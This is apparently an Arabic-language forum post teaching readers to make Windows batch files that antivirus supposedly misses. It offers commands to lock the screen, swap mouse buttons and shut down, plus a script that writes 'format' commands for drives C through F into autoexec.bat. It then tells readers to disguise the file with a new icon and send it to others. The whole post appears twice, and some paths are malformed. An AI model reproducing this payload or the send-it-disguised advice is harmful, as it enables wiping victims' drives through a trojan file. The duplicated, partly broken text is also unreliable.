السلام عليكم ورحمة الله وبركاته
اولا اخترت عنوان الموضوع بهذا الشكل لجزب اكبر عدد ممكن من الاعضاء لان الموضوع مهم
هذا الموضوع ليس لتعليم الاختراق بل لتثقيف الاعضاء وتنويرهم لبعض خفايا الانتر نت
هذا الموضوع معظم اللي يعتبروا نفسهم هاكرز ما يعرفوا عنه شيء ويعتبروه فايروس او باتش
راح اتكلم اليوم عن windows shell ******ing وهي كيف تضع اوامر الويندوز في ملفات تنفيذيه
طبعا مافي اي برنامج حمايه يقدر يصيدها
راح اعيد ثاني هذا مو فايروس او ملف تجسس عشان الاداره لا يحذفوا الموضوع
راح نبداء كيف نسوي ملف ما يمسكه اي انتي فايروس ومن اوامر الوندوز
اول شيء نروح نفتح Notepad او مفكره
ونقوم بنسخ اي كود يعجبنا
وبعد كده نقوم بحفظ الملف باسم
ونكتب اي اسم بس الامتداد .bat
يعني مثلا rdc.bat وبس
طبعا اوامر الوندوز مره كثيره
ممكن نسوي ملف ريستارت للجهاز او اقفال للجهاز او قلب زر الماوس
وممكن نبدع في هذا الشيء بالتفكير في شيء جديد
مثل ما اغلبنا يذكر فايروس lsass الي كان يعيد تشغيل الجهاز , بكل بساطه كان موضوع امر واحد
في ملف bat وهو : shutdown -s
وهذه بعض الاوامر
هذا الامر يقفل الجهاز :
%windir%\system32\rundll32.exe user32.dll,LockWorkStation
هذا الامر يقلب زر الماوس:
%windir%\system32\rundll32.exe user32.dll,SwapMouseButton
هذا الامر علشان ترجع زر الماوس
%windir%\system32\RUNDLL32.EXE shell32.dll,Control_RunDLL main.cpl @0,0
هذا الامر يسوي فرمات لكل شيء في الجهاز :
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
echo Romio Jeddah
echo Red Devils Crew
c:windowsrundll32.exe user.exe,exitwindows
ما انصح احد يستخدم الاخير الا لو كان عنده خبره في الاوامر
المهم وبعد عمل الملف يمكنك تغير ايقونة الملف بطريقه الضغط عليه
باليمين واختر خصائص وغير الايكون وبعد كده نقدر نرسلها بالطريقه اللي تناسبنا
وبس كده انتهينا من الشرح
اولا اخترت عنوان الموضوع بهذا الشكل لجزب اكبر عدد ممكن من الاعضاء لان الموضوع مهم
هذا الموضوع ليس لتعليم الاختراق بل لتثقيف الاعضاء وتنويرهم لبعض خفايا الانتر نت
هذا الموضوع معظم اللي يعتبروا نفسهم هاكرز ما يعرفوا عنه شيء ويعتبروه فايروس او باتش
راح اتكلم اليوم عن windows shell ******ing وهي كيف تضع اوامر الويندوز في ملفات تنفيذيه
طبعا مافي اي برنامج حمايه يقدر يصيدها
راح اعيد ثاني هذا مو فايروس او ملف تجسس عشان الاداره لا يحذفوا الموضوع
راح نبداء كيف نسوي ملف ما يمسكه اي انتي فايروس ومن اوامر الوندوز
اول شيء نروح نفتح Notepad او مفكره
ونقوم بنسخ اي كود يعجبنا
وبعد كده نقوم بحفظ الملف باسم
ونكتب اي اسم بس الامتداد .bat
يعني مثلا rdc.bat وبس
طبعا اوامر الوندوز مره كثيره
ممكن نسوي ملف ريستارت للجهاز او اقفال للجهاز او قلب زر الماوس
وممكن نبدع في هذا الشيء بالتفكير في شيء جديد
مثل ما اغلبنا يذكر فايروس lsass الي كان يعيد تشغيل الجهاز , بكل بساطه كان موضوع امر واحد
في ملف bat وهو : shutdown -s
وهذه بعض الاوامر
هذا الامر يقفل الجهاز :
%windir%\system32\rundll32.exe user32.dll,LockWorkStation
هذا الامر يقلب زر الماوس:
%windir%\system32\rundll32.exe user32.dll,SwapMouseButton
هذا الامر علشان ترجع زر الماوس
%windir%\system32\RUNDLL32.EXE shell32.dll,Control_RunDLL main.cpl @0,0
هذا الامر يسوي فرمات لكل شيء في الجهاز :
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
echo Romio Jeddah
echo Red Devils Crew
c:windowsrundll32.exe user.exe,exitwindows
ما انصح احد يستخدم الاخير الا لو كان عنده خبره في الاوامر
المهم وبعد عمل الملف يمكنك تغير ايقونة الملف بطريقه الضغط عليه
باليمين واختر خصائص وغير الايكون وبعد كده نقدر نرسلها بالطريقه اللي تناسبنا
وبس كده انتهينا من الشرح